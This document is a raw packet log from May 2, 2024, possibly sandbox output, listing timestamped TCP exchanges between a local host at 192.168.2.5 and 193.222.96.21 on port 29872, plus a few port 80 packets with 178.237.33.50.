                                                May 2, 2024 08:04:35.792574883 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.792587996 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.792612076 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.792651892 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.792686939 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.792758942 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.793056011 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.793056011 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.946135044 CEST8049717178.237.33.50192.168.2.5
                                                May 2, 2024 08:04:35.951194048 CEST4971780192.168.2.5178.237.33.50
                                                May 2, 2024 08:04:35.970624924 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.970647097 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.970659971 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971441031 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971468925 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971488953 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.971488953 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.971520901 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971534014 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971576929 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971587896 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971599102 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971613884 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.971613884 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.971637964 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971651077 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971677065 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.971681118 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971704006 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.971734047 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971752882 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971808910 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:35.971841097 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:35.971841097 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.149754047 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.149780035 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.149792910 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.149806976 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.149822950 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.149883986 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.149912119 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150110960 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150333881 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150350094 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150361061 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150374889 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150387049 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150398970 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150399923 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150399923 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150413036 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150424957 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150428057 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150435925 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150446892 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150460005 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150471926 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150473118 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150473118 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150490046 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150500059 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150522947 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150541067 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150544882 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150583029 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150633097 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150645018 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150655985 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150666952 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150681019 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150712967 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150726080 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150737047 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150748968 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150752068 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150789022 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150789022 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150800943 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150813103 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150824070 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.150861025 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.150861025 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328085899 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328116894 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328130007 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328140974 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328150988 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328161955 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328192949 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328203917 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328211069 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328228951 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328254938 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328255892 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328284979 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328288078 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328315973 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328334093 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328358889 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328385115 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328396082 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328427076 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328460932 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328461885 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328461885 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328521013 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328556061 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328562021 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328600883 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328661919 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328672886 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328675032 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328685999 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328731060 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328758001 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328758001 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328785896 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328849077 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328860998 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328871965 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328882933 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.328893900 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328905106 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.328921080 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.329040051 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.335292101 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335305929 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335366011 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.335387945 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335400105 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335447073 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335458994 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335477114 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335491896 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.335491896 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.335541964 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335551977 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335561991 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335596085 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335602999 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.335602999 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.335613966 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335625887 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.335666895 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.342297077 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342309952 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342327118 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342360973 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.342360973 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.342377901 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342387915 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342408895 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342434883 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.342463017 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342488050 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.342493057 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342562914 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342575073 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342605114 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.342611074 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342622042 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342638016 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.342641115 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.342709064 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.348771095 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348810911 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348836899 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348850012 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348854065 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.348908901 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348925114 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348937988 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348953009 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.348953009 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.348959923 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.348993063 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.349009991 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.488132000 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506263018 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506283045 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506323099 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506335974 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506370068 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506386042 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506395102 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506422043 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506486893 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506489992 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506499052 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506551027 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506551981 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506577015 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506630898 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506648064 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506678104 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506721973 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506731987 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506803036 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506845951 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506846905 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506903887 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506915092 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.506939888 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.506958008 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507005930 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507005930 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507040977 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507086992 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507102966 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507138014 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507138014 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507142067 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507194996 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507222891 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507234097 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507270098 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507282972 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507308006 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507338047 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507375956 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507378101 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507430077 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507472038 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507472038 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507512093 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507546902 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507550001 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507590055 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507639885 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507663965 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507667065 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507700920 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507714033 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507735014 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507781982 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507813931 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507831097 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507847071 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.507858992 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.507900000 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.508013964 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.511701107 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511749029 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511795044 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.511796951 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511821032 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511862993 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511881113 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.511914015 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511928082 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511940002 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.511957884 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.511980057 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.512001038 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.512020111 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.512043953 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.512062073 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.512079954 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.512093067 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.512125969 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.517679930 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517750025 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517772913 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.517775059 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517826080 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517832041 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.517838001 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517859936 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517882109 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.517903090 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517946959 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517956018 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.517961025 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.517971992 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.518002033 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.518023014 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.518039942 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.518050909 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.518066883 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.518090010 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.524415016 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524463892 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524475098 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524523020 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524557114 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.524557114 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.524559975 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524585009 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524629116 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.524631977 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524702072 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524713039 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524746895 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.524766922 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524791956 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524802923 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.524827957 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524848938 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.524873018 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.530941010 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.530977011 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.530988932 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531022072 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531034946 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531071901 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.531071901 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.531100988 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531130075 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.531151056 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531186104 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.531192064 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531229973 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531245947 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531280994 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.531300068 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531321049 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531335115 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.531423092 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.531461000 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.537972927 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.537988901 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538044930 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538060904 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538060904 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.538074017 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538100958 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538100958 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.538113117 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538124084 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538162947 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.538162947 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.538182020 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538193941 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538204908 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538235903 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538248062 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.538264990 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.538264990 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.544677019 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544703960 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544749022 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544773102 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544780970 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.544807911 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544809103 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.544859886 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.544867039 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544878960 CEST2987249716193.222.96.21192.168.2.5
